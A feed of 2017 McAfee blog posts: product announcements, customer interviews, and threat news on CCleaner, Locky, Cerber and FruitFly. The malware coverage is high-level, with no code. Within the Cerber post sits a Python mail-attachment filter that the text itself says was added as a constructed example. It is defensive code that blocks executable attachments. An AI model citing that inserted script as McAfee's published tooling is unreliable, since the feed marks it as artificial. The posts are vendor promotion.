Breaking Glass (and Silos)

ESG research shows that enterprises want to embrace automation as a means of getting more done with existing resources, but automation is contingent on integration of data and processes between products. That’s been difficult because of the many moving parts: accessible APIs, vendor politics, and available integration skills and time.

We’ve taken the need for easier integration to heart, building on the success of the Data Exchange Layer and the OpenDXL initiative, announced one year ago. This week, McAfee unveiled a ground-breaking integration, bridging two communications fabrics and ecosystems for end-to-end visibility and risk mitigation. By linking the Data Exchange Layer with Cisco pxGrid, we have extended the reach of high-fidelity data and the range of automated actions companies can implement, and increased the possibilities when companies take advantage of the OpenDXL open source initiative and its community.

Industry leadership like this is one reason the McAfee Security Innovation Alliance ecosystem continues to flourish, and MPOWER celebrated a nearly 15% surge in new independent software vendors joining the community.

Protecting Hybrid Cloud

One challenge of enhancing our “plane in flight” is the heterogeneous nature of the infrastructure itself. Few, if any, organizations operate security and business systems purely on-premises or purely in the cloud. Hybrid infrastructures require adaptation of implementation, access control, visibility, policies, and reporting to span and accommodate this diversity.

McAfee has expanded our portfolio of hybrid products and services with new options for using and leveraging the cloud alongside other security and corporate infrastructure.

Re-imagining CX

Finally, let’s think about the experience of managing and maintaining the plane in flight. The pilot (CISO) needs to get the job done while he keeps the passengers (end-users) happy and safe and minimizes wear and tear on his co-pilot, flight crew, and ground personnel (CIO, architect, SOC analysts, and administrators). A unified plan for the flight experience spreads calm and reliability throughout the flight, using best practices to implement features and updates, as well as to anticipate challenges and inevitable changes.

This is the design center for a new team at McAfee. At MPOWER, McAfee announced the new Customer Success Group, which unifies services, support, education, and consulting. Their first deliverable is the new Premier Success Plan.

This plan understands that buying the right tools is just a starting point. Post-sales decisions around design, deployment, maintenance, risk management, escalations, education, and strategy will have a dramatic impact on an organization’s security posture, time to value, and value over time. With so many options to choose from, it’s not always easy to know which consulting, service, and support you need to be successful. Without tracking, your team may not capture full value from the ones you order.

Our new Premier Success Plan takes away the guesswork and fills in the gaps. A comprehensive roadmap combines professional and solutions services, training, and technical support with personalized management.

Benefits All Year Long

Each year, this fall conference ushers in a wave of products, programs, and ideas, just in time for planning for the next year. You don’t need to attend to capture all of the product and program value, but the community, camaraderie, and creativity you experience can be a welcome rejuvenation from the ongoing stress of flying the security plane.

This year, it was especially important #VegasStrong.

We hope to see you next year. Soar safely.

Stay up to date on all things MPOWER17 by following us on Twitter at @McAfee.

Introducing McAfee Investigator: Automated, Expert System-Based Analytics to Transform the SOC
https://securingtomorrow.mcafee.com/business/introducing-mcafee-investigator-automated-expert-system-based-analytics-transform-soc/
Wed, 18 Oct 2017 16:02:18 +0000

The post Introducing McAfee Investigator: Automated, Expert System-Based Analytics to Transform the SOC appeared first on McAfee Blogs.

This blog was written by Barbara Kay.

SOC analysts are getting beaten up by both commodity attacks and sophisticated ones, with many companies taking far more than a day or a week to close a case and few consistently digging all the way to root cause. McAfee research collected in May 2017 documented this dilemma and showed that companies are investing in advanced analytics and automation as a way to fight back:

  • 85% of SOCs want to use more analytics
  • 84% of SOCs want to use automation to move up the maturity scale
  • Mature SOCs automate more than 3X more often than new SOC teams, but almost everyone is investing
  • Mature SOCs automate more than 50% of investigation processes, and want to automate more
  • Top active automation areas include real-time endpoint analysis, triage, forensics, and remediation.

We’re eager to help. As part of our expanding portfolio of automated threat and malware analytics based on machine learning, McAfee is proud to announce McAfee Investigator, a SaaS analytics subscription that transforms novice analysts into expert investigators. Rather than adding complexity with yet another product silo, it leverages the data sources and alerts of a SIEM and includes real-time endpoint visibility via McAfee ePolicy Orchestrator and a dissoluble agent.

McAfee Investigator automates data collection, organization, and case management within an expert system-driven workspace. Starting with prioritized triage, automation, Foundstone expertise, and machine learning (in fact, artificial intelligence as well) come together to guide analysts to consider the right questions and hypotheses for the specific situation. Insights with drill downs and visualizations help them explore the most relevant details and subtle indicators as they move rapidly through scoping, validation, documentation, and disposition.

Scott Howitt, senior vice president in the CISO organization of MGM International, says that McAfee Investigator helps them to spend more time on actual investigations:

“The way Investigator helps me mature my organization is with the automated playbooks, with the easier ability to go find like problems in my environment and things like that. My team spends less time switching between tools and focusing on how to make the tool work and actually focusing on the investigation than they did before.”

This service helps SOC teams mature operations as they fulfill several goals:

If you have an overworked SOC and a yen to try a new model that makes the most of the strengths of both humans and machines, this new service is worth a look. Visit mcafee.com/investigator or contact your sales manager to learn more.

For more news on McAfee Investigator and updates from MPOWER17 follow us on Twitter at @McAfee.

McAfee Labs Threats Report Explores WannaCry/Petya, Threat Hunting, Script-Based Malware
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-explores-wannacrypetya-threat-hunting-script-based-malware/
Tue, 26 Sep 2017 04:01:42 +0000

The post McAfee Labs Threats Report Explores WannaCry/Petya, Threat Hunting, Script-Based Malware appeared first on McAfee Blogs.

This blog post was written by Vincent Weafer.

Today we published the McAfee Labs Threats Report: September 2017. This quarter’s report shows off a new design. We hope you will find it attractive as well as informative. The report contains three highly educational topics, in addition to the usual set of threats statistics:

  • Earlier this year, WannaCry malware infected more than 300,000 computers in over 150 countries in less than 24 hours. Several weeks later, the malware Petya exploited the same operating system flaw, along with multiple other techniques, to spread to other computers on the same network. Among other lessons, these attacks exposed the continued use of old and unsupported operating systems in critical areas and laid bare the lax patch-update processes followed by some businesses. We explore the timeline and background of the WannaCry attack and Petya, its apparent follow-up; the vulnerabilities they exploited; a technical analysis of their infiltration and propagation methods; and our thoughts on the motives for these attacks and what they might lead to.
  • Threat hunting is a growing and evolving capability in cybersecurity, one with a broad definition and wide range of goals, but it is generally seen as a proactive approach to finding attacks and compromised machines without waiting for alerts. Threat hunting enables security operations to study the behaviors of attackers and build more visibility into attack chains. This results in a more proactive stance for the security operations center, shifting the focus to earlier detection, faster reaction times, and enhanced risk mitigation. In May, McAfee surveyed more than 700 IT and security professionals around the world to better understand how threat hunting is used in organizations today and how they plan to enhance their threat hunting capabilities in the future. We offer detailed advice and recommendations for using certain types of indicators of compromise when hunting for threats.
  • Cyberattackers often use scripting techniques in their assaults. Some attacks employ script-based malware at every stage, while others use it for a specific purpose. Script-based malware—written in the JavaScript, VBS, PHP, or PowerShell scripting languages—has been on the upswing during the last two years for a very simple reason: evasion. Scripts are easy to obfuscate and thus are difficult for security technology to detect. In this Key Topic, we discuss why cybercriminals leverage script-based malware, how script-based malware propagates, the types of malware that use scripts for distribution, ways in which authors obfuscate script-based malware, and how to protect against script-based malware.

Accompanying the first and last Key Topics are Solution Briefs that go into detail about how McAfee products can protect against these threats.

Here are some highlights from our extensive analysis of threats activity in Q2:

  • Malware: New malware samples leaped in Q2 to 52 million, a 67% increase. The total number of malware samples grew 23% in the past four quarters to almost 723 million samples.
  • Ransomware: New ransomware samples again increased sharply in Q2, by 54%. The number of total ransomware samples grew 47% in the past four quarters to 10.7 million samples.
  • Mobile malware: Global infections of mobile devices rose by 8%, led by Asia with 18%. Total mobile malware grew 61% in the past four quarters to 18.4 million samples.
  • Incidents: We counted 311 publicly disclosed security incidents in Q2, an increase of 3% over Q1. The health, public, and education sectors comprised more than 50% of the total. 78% of all publicly disclosed security incidents in Q2 took place in the Americas.

Read the McAfee Labs Threats Report: September 2017.

Is that Broom Removing the Dirt? Sanitizing CCleaner with McAfee Advanced Threat Defense
https://securingtomorrow.mcafee.com/business/sanitizing-ccleaner-with-mcafee-atd/
Wed, 20 Sep 2017 20:00:13 +0000

The post Is that Broom Removing the Dirt? Sanitizing CCleaner with McAfee Advanced Threat Defense appeared first on McAfee Blogs.

This blog was written by Stan Golubchik.

On Monday, security researchers in Cisco’s Talos division revealed that the ever popular, free computer clean-up tool CCleaner had been compromised for at least the past month. Attackers introduced a backdoor into the application, delivered through the software’s own update system. With an estimated installation base of 2.27 million, which highlights the pervasiveness of the application and the number of customers who could be susceptible to a breach, this could bloom into a widespread issue.

This is an atypical scenario, as CCleaner is an application users have long trusted. By exploiting the trust placed in this well-known good application, attackers could tap into the inherently trusted web servers that host and distribute its updates.

Taking a quick glimpse at VirusTotal, it’s apparent that most endpoint vendors have not caught on to the compromised application. Luckily those with McAfee defenses including McAfee Advanced Threat Defense (ATD), the advanced sandbox, could thwart the obfuscated malicious activity within the ever trusted CCleaner.

Without the requirement of amending a blacklist or a DAT update, ATD could detect malicious behavior in the latest version, 5.34, of CCleaner. ATD provides manual investigation by allowing the user an interactive window, or X-mode, into the VM which detonates the sample for analysis. Looking at the Threat Analysis Report generated after the application was analyzed, compelling evidence can be observed on the true intent of the application.

So exactly what behavior was exhibited as malicious and tagged with such a high severity? As stated earlier, attackers have exploited the trust between the update mechanism in the application with the web servers from which the updates are pulled. Looking at the Dynamic Analysis, it’s apparent that the application was attempting to download content from a suspicious webserver. Also, there is an action that describes the intent of the file to behave as ransomware would.

X-mode allows the ATD user to interact with the program while it’s running isolated within the virtual analysis environment. In addition to simply installing, executing, and running the application, the user can perform tasks in CCleaner to emulate real world behavior to reveal any evasive and latent code. As seen from the screenshot provided in the report, the application’s functionality can be triggered and monitored in an isolated environment to prevent any propagation of the threat.

Additionally, other behavioral awareness indicators can be observed through the report, providing a more thorough analysis and confident assessment of the intent of the application. These include embedded and dropped content, file operations, and network activity.

CCleaner has historically been a reliable tool in sweeping up and cleaning a machine’s unwanted temporary files and invalid Windows registry entries. Reliability that’s trusted by millions. Through the exploitation of this trust-based relationship between the application and users, attackers could successfully utilize a method to infiltrate and potentially compromise victim machines. This is where advanced malware detection capabilities demonstrate their true value. McAfee Advanced Threat Defense swept up the unwanted files and cleaned house. Even your trusty broom needs a good cleaning occasionally.

Head of Security Operations Talks About His “Leap of Faith” Hiring McAfee Resident Support
https://securingtomorrow.mcafee.com/business/head-security-operations-talks-leap-faith-hiring-mcafee-resident-support/
Tue, 12 Sep 2017 14:00:44 +0000

The post Head of Security Operations Talks About His “Leap of Faith” Hiring McAfee Resident Support appeared first on McAfee Blogs.

Serving more than seven million clients and members, The Desjardins Group is the largest financial cooperative in Canada. Its employees like to say that it provides the gamut of financial services “from birth to death.”

To protect the Group’s geographically dispersed network of 47,600 employees and 70,000 endpoints (including more than 8,000 servers), Christian Gauthier, director of surveillance and security, has an extensive staff. His team oversees a host of McAfee products purchased under an Enterprise License Agreement (ELA). In 2014, he added a McAfee Resident Support Account Manager (RSAM), Yves Melançon.

“Initially, paying for an RSAM was quite a tough sell and required a leap of faith,” says Gauthier.

He already had a highly skilled staff, as McAfee RSAM Melançon confirms. “I have been at many companies and Desjardins’ security staff stand out,” says Melançon.

Gauthier was willing to take that leap of faith, however, because even a few hours of downtime—for instance, if online banking goes down—cost The Desjardins Group greatly. Gauthier believed that a McAfee RSAM would pay off in faster time to resolution and downtime avoidance.

His faith was rewarded.

“We have found Yves to be worth much more than the additional staff we might have hired instead of him,” says Gauthier. “He is extremely knowledgeable and can figure out what’s wrong or else escalate to the right people and get us quickly to resolution, usually without me having to say a word. By saving us time and helping us avoid downtime, he has saved us a lot of money.”

Hard Numbers and Examples

When the McAfee RSAM contract came up for renewal, Gauthier knew that The Desjardins Group’s new chief information security officer would require more than just his word that Yves Melançon was worth the cost. So Gauthier gathered “hard numbers” and specific examples to demonstrate the value of the RSAM.

“Using very conservative figures, I easily justified Yves’ presence,” says Gauthier. “Yves’ ability to accelerate resolution—to get answers in seconds rather than having to open a ticket, or to go directly to the best resource within McAfee— has minimized costly downtime and disruption as well as saved us a ton of time.”

Gauthier also cited specific examples of time and monetary savings that could be credited to having a McAfee RSAM on board. For instance, intrusion prevention system latency was preventing The Desjardins Group from taking on a very large retail chain that desired to use its payment system. As soon as Melançon learned of the situation, he contacted the McAfee Network Security Platform (IPS) developers, who quickly ascertained the problem. Within 48 hours, the problem was solved, outdated equipment replaced, and Desjardins had a major new customer and revenue stream. That incident alone proved the immense value of the RSAM.

In his figures for the CISO, Gauthier didn’t factor in time saved from faster deployment and deployment done right the first time. Take, for example, a recent deployment of McAfee Advanced Threat Defense. “With Yves’ help, McAfee Advanced Threat Defense worked well from the start, immediately catching ransomware, greyware, and banking-specific malware,” explains Gauthier. “The kind of knowledge and insider access to resources that Yves has, you just can’t hire that off the street.”

Gauthier recalls an interaction at the annual McAfee FOCUS (now MPOWER) user conference two years ago that made him value his McAfee RSAM even more. “We had been having trouble with a now obsolete McAfee product,” he recollects. “Yves walked me over to the top technical person for that product, introduced me, and basically demanded that our issues be addressed immediately. I knew without a doubt he was working for me and it made a real difference.”

How do you know if an RSAM is right for your company?

Gauthier is clearly happy with his decision to hire a McAfee RSAM, but should every company with 70,000 nodes hire an RSAM? Should every company with more than a certain threshold of nodes or number of McAfee products?

Not necessarily.

According to Gauthier, whether you should consider hiring an RSAM doesn’t depend on the number of nodes or products, but on complexity. “As the complexity of your McAfee security environment increases, the value of a McAfee RSAM grows exponentially,” he says. “Having the right person with access to the right resources makes an enormous difference.”

The founder of The Desjardins Group, Alphonse Desjardins, had a motto: “S’unir pour servir,” which translates to “Unite to serve,” similar to McAfee’s motto “Together is Power.” No wonder Melançon fits right in.

“Yves is as much a part of our team as those receiving a paycheck from Desjardins,” Gauthier says. “There is no ‘theirs’ and ‘ours’; we are one team and he’s one of ours.”


To read the full case study, click here. Get your questions answered by tweeting @McAfee_Business.

Locky Ransomware Makes a Comeback with New .Diablo6 and .Lukitus Variants
https://securingtomorrow.mcafee.com/business/locky-ransomware-makes-comeback-new-diablo6-lukitus-variants/
Mon, 28 Aug 2017 17:12:47 +0000

The post Locky Ransomware Makes a Comeback with New .Diablo6 and .Lukitus Variants appeared first on McAfee Blogs.

Tim Hux contributed to this blog.

Old threats die hard, it seems: Locky ransomware, one of the most powerful threats out there, is back in town. Historically, we’ve seen this ransomware do serious damage, as it has rapidly adapted its capabilities to keep victims and security researchers bewildered. Now, it’s evolved with two new forms to become even more stealthy and advanced.

First, let’s back up – where did Locky get its start? Locky was discovered in late 2015 and has been one of the most prevalent ransomware threats to date, contending with the likes of Cerber, Petya, Spora, and WannaCry. In 2016, Locky hit its stride, infecting millions of users worldwide primarily through malicious attachments in spam emails. To stay agile, the malware changed the extension it appends to encrypted files, using .locky, .zepto, and .odin across different campaigns. Fast forward to 2017 and the stealthy ransomware is back on the scene, equipped with two variants that use either the .Diablo6 or .Lukitus extension for encrypted files.

What do these .Diablo6 and .Lukitus variants look like? Both variants are distributed via spam emails, though this particular campaign sends them in the form of PDF attachments with embedded .DOCM files. They’re also spread through the Necurs botnet, which Locky used in the past.

Beyond utilizing the Necurs botnet, both variants carry some other callbacks to older versions of Locky. All variants (old and new) contain a flag in the code that checks whether the language of the Windows operating system is Russian and, if so, will not run and encrypt the victim’s files. This is most likely because the majority of Locky attacks originate from Russia, as exemplified in the map below.

Given that both .Diablo6 and .Lukitus demand a ransom of 0.49 BTC (roughly $1,900.00) for the decryption key to unlock the infected files, and that those behind Locky have yet to be identified, the next question is: what can users do to stay secure?

Start with education. Since the latest two variants of Locky come in the form of spam email with zip or rar attachments, it’s important everyone is trained on how to deal with suspicious emails. Additionally, be sure to back up your data often in case you need to wipe your device clean after an attack. You can do this by utilizing a backup drive or by backing up to the cloud. This way, you can easily retrieve your important information without paying a ransom.

Stay up-to-date on Locky ransomware and others like it by following @McAfee and @McAfee_Business.

Time to Close vs. Root Cause – Are we measuring the wrong thing (again)? https://securingtomorrow.mcafee.com/business/security-operations/time-to-close-vs-root-cause/ https://securingtomorrow.mcafee.com/business/security-operations/time-to-close-vs-root-cause/#respond Tue, 22 Aug 2017 19:00:08 +0000 https://securingtomorrow.mcafee.com/?p=77013

The post Time to Close vs. Root Cause – Are we measuring the wrong thing (again)? appeared first on McAfee Blogs.

This blog was written by Barbara Kay.

“Human beings adjust behavior based on the metrics they’re held against. Anything you measure will impel a person to optimize his score on that metric. What you measure is what you’ll get. Period.” – Dan Ariely, Duke University behavioral economist in Harvard Business Review

When the Verizon Data Breach Investigation Report started reporting “time to” metrics around 2013 (time to detect, time to contain, time to remediate), most security operations managers started to monitor their own team’s performance against these stats. That’s not a bad thing – I’ve certainly touted these numbers in my posts before. They help assess workloads and justify investment.

However, as managers, we need to add another lens to emphasize efficiency AND effectiveness.

Closing cases (time to contain, time to remediate) without getting to root cause is like chopping off the arm of the starfish – the arm will likely grow back and may come back bigger and nastier.

Why care about root cause?

Root cause is the secret to returning to a healthy state. Getting to root cause means you identify how the attacker got in, which systems provided cover, which credentials were abused, and how they manipulated system, countermeasure, and application software to hide their tracks. When you push investigations to the point of root cause analysis, you are more likely to fully scope the attacker’s activities and excise them from your estate. If you don’t get to root cause, an attacker may retain a foothold, ready to reactivate after you have reimaged the host or blocked an IP address and claimed “case closed.” That lingering presence means you still risk damage, as well as repeated cleanup costs.

In Disrupting the Disruptors, Art or Science?, we researched threat hunting practices in security operations centers. Time to close is an important stat, and the most mature orgs are closing faster than anyone else, by a huge margin. Mature orgs were 2 times more likely to close cases within a day than the merely innovative, and closer to three times more likely to close within a day than the SOCs just getting started. (For details on the maturity definitions and other findings, download the free report.)

Leaders close, with higher confidence the incident won’t recur

But there’s another very important metric that clearly isn’t being rewarded as aggressively, or the numbers would be better, per the behavioral psychologists who say you get what you measure. The most advanced threat hunting organizations are winning on time to close AND aggressively uncovering root cause. Hunters at the minimal level typically determine the cause of just 20-30% of attacks, compared to leading hunters, who dig in to find the cause of 70% or more.

Net net: the leading SOCs are closing more cases faster AND getting to root cause most of the time – performing far better than their peer groups. As an industry, let’s start to measure both of these goals to increase overall cybersecurity health.

For insights on how leading SOCs are achieving these results, such as advanced use of automation and sandboxing, read the report.

Interview with IS Director on Building a “Game Changing” Threat Defense Architecture https://securingtomorrow.mcafee.com/business/interview-director-building-game-changing-threat-defense-architecture/ https://securingtomorrow.mcafee.com/business/interview-director-building-game-changing-threat-defense-architecture/#respond Fri, 11 Aug 2017 14:00:24 +0000 https://securingtomorrow.mcafee.com/?p=76898

The post Interview with IS Director on Building a “Game Changing” Threat Defense Architecture appeared first on McAfee Blogs.

Director of Information Security Simon Brown oversees information security for the Liquor Control Board of Ontario (LCBO), one of the world’s largest retailers of beverage alcohol. LCBO operates 650 brick-and-mortar retail stores plus ecommerce and mobile storefronts across the Canadian province. The adaptable threat defense infrastructure that Brown and his very small IS team have built enables them to manage security with minimal resources and to find and respond to cyberthreats in minutes across LCBO’s extended enterprise.

Why did you move from a managed service provider (MSP) model to an infrastructure based primarily on McAfee solutions?

We came to the realization that we could get more value with our own high-quality staff and the right tools. Plus, we would no longer have to rely on external businesses that will never know our business as well as we do. …We had used McAfee endpoint protection and the McAfee ePO™ central console but we didn’t seriously consider McAfee ePO as a means of managing other enterprise security solutions until our new CIO’s push for standardization. Because of the McAfee integrated security platform—the way all its solutions work together and enhance each other—it made total sense to leverage our existing McAfee endpoint environment and McAfee ePO.

How did you strategically roll out the various McAfee solutions?

The first thing we did was consolidate our five instances of McAfee ePO into one production console and one quality assurance console. Then, because our legacy SIEM was being obsoleted, we deployed McAfee Enterprise Security Manager and other components of the McAfee SIEM. We decided out of the gate that we would obtain the best value out of McAfee Threat Intelligence Exchange, McAfee Advanced Threat Defense (ATD), and McAfee Endpoint Threat Defense and Response. It didn’t make sense to deploy these solutions without McAfee Endpoint Security in place so we rolled it out after the SIEM and then layered in the other solutions.

What do you appreciate most about McAfee Endpoint Security (ENS)? Do you have any advice for those considering migration to McAfee ENS?

Across the majority of our 6,000 endpoints, we migrated [McAfee VirusScan® Enterprise] to McAfee ENS version 10.5, including the cloud-based Real Protect machine learning functionality and Dynamic Application Containment (DAC). We especially appreciate DAC. Knowing that any file that is not already tagged as trusted will be contained before it can cause damage gives me considerable peace of mind.

When you migrate from [McAfee VirusScan Enterprise], it is important to spend time up front to ensure you migrate rule sets from ‘like to like,’ but the benefits of migrating to McAfee ENS far outweigh any work required to make the transition.

How about McAfee Endpoint Threat Defense and Response, which you deployed across all your back-office and point-of-service servers and production desktops?

With McAfee Active Response [functionality in McAfee Endpoint Threat Defense and Response], we can quickly and easily search for hashes, filenames, IP addresses…You name it, we go find it. Finding suspicious files fast reduces the time needed to respond appropriately and shrinks the window of vulnerability.

…In the [McAfee] Active Response workspace, we can view a list of all potential threats or of high-risk threats or threat timelines. We can click on an executable or other suspicious file, drill down to discover where it is installed, see what it is doing to its host system, and get a full read-out of its behavior. We can then click to take action, such as mark the file as known trusted or known malicious, or end or delete the process, for that one system or companywide—all from one console. It really is remarkable.

Please walk us through a typical potential threat scenario now that you have this integrated threat defense.

As soon as a potentially malicious file has been detected—for example, from an endpoint or IPS—and sent to McAfee ATD, we receive an alert from our McAfee SIEM. McAfee ATD gives us a better idea of the nature of the hash value or file name that is tripping the alert. Then we search using McAfee Endpoint Threat Defense and Response or McAfee Threat Intelligence Exchange to find out where the file exists, on which endpoint…Within minutes after being alerted, either by the SIEM or an email, we can ascertain whether the threat has been dealt with, and, if not, take appropriate action.

That we can now quickly see exactly where an infection exists within our entire environment and, if we want to, within minutes remove it—not only from that endpoint but from every single endpoint in our network—is a game changer. We simply couldn’t do anything like that before; it would have taken much longer to find the executable and remove it throughout the environment.

What other products are you in the process of adding to your infrastructure?

We are in the process of rolling out McAfee Web Gateway and McAfee Database Event Monitor for SIEM. The former will offload some of the web filtering load from our IPSs and enable suspicious files entering via the web to be sent directly to McAfee ATD for analysis. McAfee Database Activity Monitoring will watch key databases for out-of-the-ordinary activity and help combat “permissions creep.”

In sum, what are the main benefits of the McAfee integrated security platform for LCBO?

Ultimately, the main benefits of the McAfee ecosystem are integration and speed to recovery, which is itself a byproduct of integration. With everything integrated, we can manage our entire security infrastructure from two to three panes of glass instead of six or seven. Less things to see, less things to miss…and the ability to recover from an attack in minutes to an hour, rather than days or weeks, just can’t be overstated.

 

To read the LCBO case study, click here. Get your questions answered by tweeting @McAfee_Business.

Cerber Ransomware Is Now Capable of Stealing Browser Passwords, Bitcoin Wallet Data https://securingtomorrow.mcafee.com/business/cerber-ransomware-now-capable-stealing-browser-passwords-bitcoin-wallet-data/ https://securingtomorrow.mcafee.com/business/cerber-ransomware-now-capable-stealing-browser-passwords-bitcoin-wallet-data/#respond Thu, 10 Aug 2017 18:32:07 +0000 https://securingtomorrow.mcafee.com/?p=76890

The post Cerber Ransomware Is Now Capable of Stealing Browser Passwords, Bitcoin Wallet Data appeared first on McAfee Blogs.

Adam Wosotowsky contributed to the blog.

Threats are evolving, especially ransomware. Cerber ransomware, one of the most powerful strains out there, is no exception. The threat used to be fairly run-of-the-mill ransomware: it infected devices through various social engineering techniques, encrypted the files on an infected computer, and demanded a ransom to restore them. Now a new variant of Cerber has emerged that is even more advanced. In addition to its existing capabilities, the malware can now steal Bitcoin wallet data and stored browser password information.

Cerber ransomware has developed rapidly over the past few years. Building on its initial capabilities, the threat soon gained the ability to evade detection by cybersecurity tools, then was sold ‘as a service’ to low-level hackers who want to make a quick buck from ransomware, with the authors taking a share of every single ransom payment. To make matters worse, the ransomware uses very strong encryption. Now Cerber has found yet another way to profit: stealing cryptocurrency directly from a Bitcoin wallet and scooping up stored password information as well.

While this is an escalation of the attacker’s capability, there are some holes in the implementation that may prevent them from fully accessing the wallet. However, it’s important to note, Cerber deletes a Bitcoin wallet before the ransomware even encrypts files, so paying the ransom won’t get the wallet back.

The next question is: what can users do to stay protected? First, remember that there has never been a security incident with the Bitcoin blockchain itself; all the “bitcoin hacks” so far have exploited security holes in the websites that handle bitcoin management, not the blockchain.

For bitcoin users, it’s crucial to never put all your coins in one place. Someone who wants to protect their assets should have separate active and savings bitcoin wallets where the active wallet can be managed by an online bitcoin service that can handle spending the coins, and the savings wallet is kept separate from online services. If you have such a savings wallet, you should keep hardcopies somewhere. This way, if a Cerber infection downloads and deletes your wallet you only need to take your backup savings wallet and send all the money to a new wallet that the Cerber attackers don’t have.

And since Cerber itself uses email attachments as an attack vector, the attack can also be prevented by a corporate mail policy that blocks any executable attachments, even when they are inside zip files. If the attack payload is a Word document or PDF attachment with a macro downloader, then you will need to rely on AV and good judgement.
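The mail policy described above can be approximated as an attachment check that blocks executables even when nested inside zip files and routes macro-capable documents and PDFs to AV/sandbox review instead. This is an added example, not code from the post or from a McAfee product; the extension lists, thresholds, and sample archive are constructed assumptions.

```python
"""Attachment policy check (added example): block executables even inside zip
archives; send macro documents, PDFs and unparsed archives to AV/sandbox review.
Extension lists, limits and sample data are constructed for this example."""
import io
import zipfile
from dataclasses import dataclass, field

# Executable/script types the policy blocks outright (constructed list).
BLOCK_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".dll", ".msi", ".bat", ".cmd",
                    ".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".ps1", ".lnk"}
# Macro-capable Office files and PDFs cannot be judged by name alone, so they
# go to AV/sandbox review rather than being blocked.
REVIEW_EXTENSIONS = {".doc", ".docm", ".xls", ".xlsm", ".ppt", ".pptm", ".pdf"}
ZIP_EXTENSIONS = {".zip"}                    # opened and inspected inline
OPAQUE_ARCHIVES = {".rar", ".7z", ".iso"}    # not parsed here: send to review
MAX_DEPTH = 3                        # stop recursing into deeply nested archives
MAX_MEMBERS = 1000                   # absurdly large listings are suspicious
MAX_NESTED_BYTES = 50 * 1024 * 1024  # refuse to inflate huge nested archives

SEVERITY = {"allow": 0, "review": 1, "block": 2}


@dataclass
class Verdict:
    """Policy outcome for one attachment; the most severe finding wins."""
    action: str = "allow"
    reasons: list = field(default_factory=list)

    def raise_to(self, action, reason):
        if SEVERITY[action] > SEVERITY[self.action]:
            self.action = action
        self.reasons.append(reason)


def extension(name):
    """Lower-cased final extension, so 'scan.pdf.exe' yields '.exe'."""
    base = name.rsplit("/", 1)[-1].lower()
    return base[base.rfind("."):] if "." in base else ""


def inspect_attachment(name, data, depth=0, verdict=None):
    """Classify one attachment. `data` is only read when it is a zip archive."""
    verdict = verdict if verdict is not None else Verdict()
    ext = extension(name)
    if ext in BLOCK_EXTENSIONS:
        verdict.raise_to("block", f"executable attachment: {name}")
    elif ext in REVIEW_EXTENSIONS:
        verdict.raise_to("review", f"macro-capable or scriptable document: {name}")
    elif ext in OPAQUE_ARCHIVES:
        verdict.raise_to("review", f"archive type not inspected here: {name}")
    elif ext in ZIP_EXTENSIONS:
        _inspect_zip(name, data, depth, verdict)
    return verdict


def _inspect_zip(name, data, depth, verdict):
    if depth >= MAX_DEPTH:
        verdict.raise_to("review", f"archive nested deeper than {MAX_DEPTH}: {name}")
        return
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
        members = archive.infolist()
    except zipfile.BadZipFile:
        verdict.raise_to("review", f"corrupt or non-zip data: {name}")
        return
    if len(members) > MAX_MEMBERS:
        verdict.raise_to("review", f"{len(members)} members in {name}")
        return
    for info in members:
        if info.is_dir():
            continue
        member = f"{name}/{info.filename}"
        encrypted = bool(info.flag_bits & 0x1)  # bit 0 of the general-purpose flags
        if extension(info.filename) in ZIP_EXTENSIONS:
            # Member names are visible even in encrypted zips, nested content is not.
            if encrypted:
                verdict.raise_to("review", f"encrypted nested archive: {member}")
            elif info.file_size > MAX_NESTED_BYTES:
                verdict.raise_to("review", f"nested archive too large: {member}")
            else:
                inspect_attachment(member, archive.read(info), depth + 1, verdict)
        else:
            # Non-archive members are judged by name; no extraction needed.
            inspect_attachment(member, b"", depth + 1, verdict)


def build_sample_zip():
    """Constructed sample: 'invoice.zip' holding a .docm plus a nested zip that
    hides a double-extension executable, the pattern the post warns about."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("scan.pdf.exe", b"MZ placeholder, not a real binary")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("order.docm", b"placeholder document bytes")
        z.writestr("scans.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    verdict = inspect_attachment("invoice.zip", build_sample_zip())
    print(verdict.action)  # block
    for reason in verdict.reasons:
        print(" -", reason)
```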

Beyond that, always practice good security hygiene: avoid opening documents and attachments from unfamiliar sources, and change all passwords so that each one is unique and complex.

To learn more about this ransomware attack and others like it, follow us at @McAfee and @McAfee_Business.

New Surveillance Malware “FruitFly” Is a Nearly Undetectable Mac Backdoor https://securingtomorrow.mcafee.com/business/new-surveillance-malware-fruitfly-nearly-undetectable-mac-backdoor/ https://securingtomorrow.mcafee.com/business/new-surveillance-malware-fruitfly-nearly-undetectable-mac-backdoor/#respond Thu, 03 Aug 2017 20:00:29 +0000 https://securingtomorrow.mcafee.com/?p=76711

The post New Surveillance Malware “FruitFly” Is a Nearly Undetectable Mac Backdoor appeared first on McAfee Blogs.

Charles McFarland contributed to this blog.

Mac malware outbreaks used to be viewed as a rarity. However, the last few years have seen Mac-focused threats steadily on the rise. In fact, our McAfee Labs Quarterly Threats Report showed instances of Mac malware growing by a huge 744% in 2016. Fast forward to the summer of 2017, and a new and powerful strain of Mac malware has hit the scene. Named FruitFly, the threat has only recently been detected by researchers, despite being around for years. The malware is highly invasive and capable of taking complete control of an infected Mac.

FruitFly works as a traditional RAT (remote access trojan). Once it infects a Mac, it opens a backdoor that lets the attacker control the infected device by sending it system commands from a command-and-control (C&C or C2) server. These commands include taking screenshots of the display, remotely switching on the webcam, and modifying files. Later versions of FruitFly also appear able to control mouse movements and interactions with the infected machine.

Though powerful, FruitFly is largely old-fashioned. It is partly written in the Perl programming language, which is not commonly used anymore. In addition, the open-source libjpeg code, which lets programmers handle the JPEG image format, also appears in FruitFly malware samples and dates back to at least 1998. This all suggests the programmers have been around for some time.

Who has been impacted by FruitFly so far? Fortunately, only a small number of users are known to have been targeted by both old and new variants. Biomedical personnel were the main target of the first variant and users at home were the target of the later variant. However, smaller, tailored FruitFly campaigns may continue to persist for a while, which means all Mac users need to be vigilant. Additionally, much of the code written for FruitFly is cross platform, meaning that it can also run on Linux. While the current version does not run fully on Linux, there are only a few necessary changes to make it viable. This suggests a Linux variant may exist or is planned.

